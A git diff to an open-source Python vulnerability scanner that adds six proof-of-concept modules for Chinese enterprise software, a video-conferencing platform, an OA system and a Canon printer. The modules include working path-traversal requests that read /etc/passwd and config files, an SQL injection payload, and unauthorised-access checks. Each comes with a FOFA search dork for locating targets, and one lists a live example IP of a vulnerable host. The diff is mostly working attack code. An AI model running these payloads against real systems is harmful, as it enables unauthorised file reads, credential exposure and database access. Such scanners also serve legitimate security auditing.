diff --git a/README.md b/README.md index 6c54ea1..8c8b7ab 100644 --- a/README.md +++ b/README.md @@ -10,14 +10,14 @@ [![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv3-brown.svg)](https://github.com/openx-org/blen/blob/main/LICENSE) -[![POC_NUM](https://img.shields.io/badge/poc_num-174-orange.svg)](#PocSupport) +[![POC_NUM](https://img.shields.io/badge/poc_num-180-orange.svg)](#PocSupport) ![GitHub Repo stars](https://img.shields.io/github/stars/openx-org/blen?color=gree) ![GitHub forks](https://img.shields.io/github/forks/openx-org/blen?color=blue) ## 🦌 简介 -1、POC数量、经过OpenxLab实验室小伙伴们的不懈努力现已有174个POC; +1、POC数量、经过麒麟实验室小伙伴们的不懈努力现已有180个POC; 2、使用python编写、跨平台、并发能力强、扫描速度非常快; @@ -202,6 +202,7 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||大唐电信AC集中管理平台默认口令|``poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/poc.py``| ||MAC1200R电信定制版默认弱口令|``poc/China_TeleCOM_中国电信/MAC1200R_Weak_Pass/poc.py``| |中国移动|中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞|``poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py``| +|Combodo iTop|Combodo iTop信息泄露漏洞|``poc/Combodo_ITop/Info_Disclosure/poc.py``| |common(通用)|git信息泄露|``poc/common/Git_Info_Disclosure/poc.py``| ||svn信息泄露|``poc/common/Svn_Info_Disclosure/poc.py``| ||URL存活检测|``poc/common/Url_Alive/poc.py``| @@ -245,14 +246,18 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx |海康威视|HIKVISION 视频编码设备接入网关 任意文件下载|``poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py``| ||HIKVISION 流媒体管理服务器弱口令|``poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py``| ||HIKVISION 流媒体管理服务器任意文件读取|``poc/HIKVISION/File_Read_Stream_Media_Manager/poc.py``| +|宏景|宏景人力资源信息管理系统 文件读取漏洞|``poc/HJ_宏景/File_Read/poc.py``| |宏电|宏电 H8922 后台任意文件读取漏洞|``poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py``| |好视通|好视通视频会议平台 任意文件下载|``poc/HST_好视通/File_Download/poc.py``| +||好视通视频会议平台 任意文件读取|``poc/HST_好视通/File_Read/poc.py``| |华为|Huawei HG659 lib 任意文件读取漏洞|``poc/Huawei/File_Read_HG659_lib/poc.py``| +|华天OA|华天动力OA sql注入漏洞|``poc/HT_华天OA/Sqli_ApiController/poc.py``| |Wayos AC|集中管理系统默认弱口令|``poc/WayosAC/poc.py``| |汇文|汇文OPAC敏感信息泄露|``poc/HuiWen_汇文/Info_Disclosure/poc.py``| ||汇文OPAC弱口令|``poc/HuiWen_汇文/Weak_Pass/poc.py``| |蜂网互联|蜂网互联 企业级路由器v4.31 密码泄露漏洞|``poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py``| |Intelbras|Intelbras Wireless 未授权与密码泄露|``poc/Intelbras/UPInfo_Disclosure_CVE_2021_3017/poc.py``| +|佳能打印机|IRADVC3325 佳能打印机未授权访问漏洞|``poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py``| |Jboss|Jboss未授权访问|``poc/Jboss/Unauth_Access/poc.py``| |Jellyfin|Jellyfin任意文件读取|``poc/jellyfin/File_Read_CVE_2021_21402/poc.py``| ||Jellyfin RemoteImageController.cs SSRF漏洞(CVE-2021-29490)|``poc/jellyfin/SSRF_CVE_2021_29490/poc.py``| @@ -273,12 +278,14 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||Lanproxy弱口令漏洞|``poc/Lanproxy/Weak_Pass/poc.py``| |朗驰欣创|朗驰欣创视频监控系统 FTP账号密码泄露|``poc/LinkSeek_朗驰欣创/FTP_Account_Info_Disclosure/poc.py``| |利谱第二代防火墙|利谱第二代防火墙存在信息泄露漏洞|``poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py``| +|龙软科技|龙软科技 全员考试系统信息泄露|``poc/LR_龙软科技/Info_Disclosure/poc.py``| |佑友|佑友防火墙 弱口令|``poc/MailGard_佑友/Weak_Pass_FireWall/poc.py``| ||佑友防火墙 后台命令执行漏洞|``poc/MailGard_佑友/RCE_ping_FireWall/poc.py``| |迈普 ISG1000安全网关|迈普 ISG1000安全网关 任意文件下载漏洞|``poc/MaiPu_迈普/File_Download_webui/poc.py``| |MC573|MC573未授权访问|``poc/MC573/UnAuth_MC573/poc.py``| |MessageSolution企业邮件归档管理系统|MessageSolution企业邮件归档管理系统 EEA 信息泄露|``poc/MessageSolution/Info_Disclosure/poc.py``| |MetaBase|MetaBase任意文件读取漏洞 CVE-2021-41277|``poc/Metabase/File_Read_CVE_2021_41277/poc.py``| +|木云科技|资源统一管理平台未授权访问漏洞|``poc/MY_木云科技/Unauth_Access/poc.py``| |蓝海卓越|蓝海卓越计费管理系统 任意文件读取|``poc/NatShell_蓝海卓越/File_Read/poc.py``| ||蓝海卓越计费管理系统 认证hash泄露|``poc/NatShell_蓝海卓越/HashInfo_DisClosure/poc.py``| |中科网威|中科网威 下一代防火墙控制系统 账号密码泄露漏洞|``poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py``| diff --git a/poc/HJ_宏景/File_Read/poc.py b/poc/HJ_宏景/File_Read/poc.py new file mode 100644 index 0000000..edf2f04 --- /dev/null +++ b/poc/HJ_宏景/File_Read/poc.py @@ -0,0 +1,75 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-17", # POC创建时间 + "UpdateDate" : "2022-10-17", # POC创建时间 + "PocDesc" : """ + 通过该POC可以下载passwd文件造成信息泄露漏洞。 + POC为:URL+/servlet/OutputCode?path=QaHzSRQ~31~33OxiAgey~30gWstj~32~37va~39~32BSE~30DEBXPAATTP~32HJFPAATTPrGDABkY~34P~37~36rAis~38LWQntWOE~38He + + """, # POC描述,写更新描述,没有就不写 + + "name" : "北京宏景世纪软件股份有限公司人力与人才信息管理系统文件读取漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-1017", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-17", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + app="人力资源信息管理系统" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/servlet/OutputCode?path=QaHzSRQ~31~33OxiAgey~30gWstj~32~37va~39~32BSE~30DEBXPAATTP~32HJFPAATTPrGDABkY~34P~37~36rAis~38LWQntWOE~38He" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False) + if "root:/root" in req.text:#req.status_code == 200 and : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/HST_好视通/File_Read/poc.py b/poc/HST_好视通/File_Read/poc.py new file mode 100644 index 0000000..6c63761 --- /dev/null +++ b/poc/HST_好视通/File_Read/poc.py @@ -0,0 +1,72 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-09-20", # POC创建时间 + "UpdateDate" : "2022-09-20", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "好视通视频平台 任意文件读取", # 漏洞名称 + "VulnID" : "oFx-2022-0003", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "好视通视频会议平台", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-09-20", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + app="好视通-视频会议" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/register/toDownload.do?fileName=..\..\..\..\FMServer/ServiceConfig.xml" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if "fastmeeting" and "live_ice.cfg"in req.text and req.status_code == 200 : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/HT_华天OA/Sqli_ApiController/poc.py b/poc/HT_华天OA/Sqli_ApiController/poc.py new file mode 100644 index 0000000..bb247e3 --- /dev/null +++ b/poc/HT_华天OA/Sqli_ApiController/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-11", # POC创建时间 + "UpdateDate" : "2022-10-11", # POC创建时间 + "PocDesc" : """ + + """, # POC描述,写更新描述,没有就不写 + + "name" : "华天动力OAsql注入漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-1011", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-11", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + app="华天动力-OA8000" + """, # fofa搜索语句 + "example" : "http://14.29.237.26:88/", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/OAapp/HtClientServlet2" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + data = "command=getChat&receiver='%20or%201=1%20or%20''='" + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.post(url,headers = headers, data = data, proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and "W3siY29udGVudCI6" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py b/poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py new file mode 100644 index 0000000..1fc3b16 --- /dev/null +++ b/poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-24", # POC创建时间 + "UpdateDate" : "2022-10-24", # POC创建时间 + "PocDesc" : """ + + """, # POC描述,写更新描述,没有就不写 + + "name" : "佳能打印机设备存在未授权访问漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-1027", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-27", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and "设备名称 :" and "C3325 (QTS24430)" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/LR_龙软科技/Info_Disclosure/poc.py b/poc/LR_龙软科技/Info_Disclosure/poc.py new file mode 100644 index 0000000..2fdfdc1 --- /dev/null +++ b/poc/LR_龙软科技/Info_Disclosure/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-19", # POC创建时间 + "UpdateDate" : "2022-10-19", # POC创建时间 + "PocDesc" : """ + + """, # POC描述,写更新描述,没有就不写 + + "name" : "北京龙软科技股份有限公司全员考试系统信息泄露", # 漏洞名称 + "VulnID" : "oFx-2022-1019", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-19", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + icon_hash="-743571358" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/files/temp/" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False) + if "/files/temp/" in req.text:#req.status_code == 200 and : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/MY_木云科技/Unauth_Access/poc.py b/poc/MY_木云科技/Unauth_Access/poc.py new file mode 100644 index 0000000..bd5acff --- /dev/null +++ b/poc/MY_木云科技/Unauth_Access/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-10-24", # POC创建时间 + "UpdateDate" : "2022-10-24", # POC创建时间 + "PocDesc" : """ + + """, # POC描述,写更新描述,没有就不写 + + "name" : "木云科技资源统一管理平台存在未授权访问漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-1024", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-10-24", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + title="资源统一管理平台" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/logger/siteSituational/?id=s1&tokenundefined" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and "站点分析 - 资源统一管理平台系统" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/common/Git_Info_Disclosure/poc.pyc b/poc/common/Git_Info_Disclosure/poc.pyc deleted file mode 100644 index 0c45933..0000000 Binary files a/poc/common/Git_Info_Disclosure/poc.pyc and /dev/null differ diff --git a/poc/common/Svn_Info_Disclosure/poc.pyc b/poc/common/Svn_Info_Disclosure/poc.pyc deleted file mode 100644 index 04401dd..0000000 Binary files a/poc/common/Svn_Info_Disclosure/poc.pyc and /dev/null differ diff --git a/poc/common/Url_Alive/poc.pyc b/poc/common/Url_Alive/poc.pyc deleted file mode 100644 index 53d68f5..0000000 Binary files a/poc/common/Url_Alive/poc.pyc and /dev/null differ diff --git a/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc b/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc deleted file mode 100644 index fd50364..0000000 Binary files a/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc and /dev/null differ diff --git a/poc/php/Backdoor_v8dev/poc.pyc b/poc/php/Backdoor_v8dev/poc.pyc deleted file mode 100644 index 22d0293..0000000 Binary files a/poc/php/Backdoor_v8dev/poc.pyc and /dev/null differ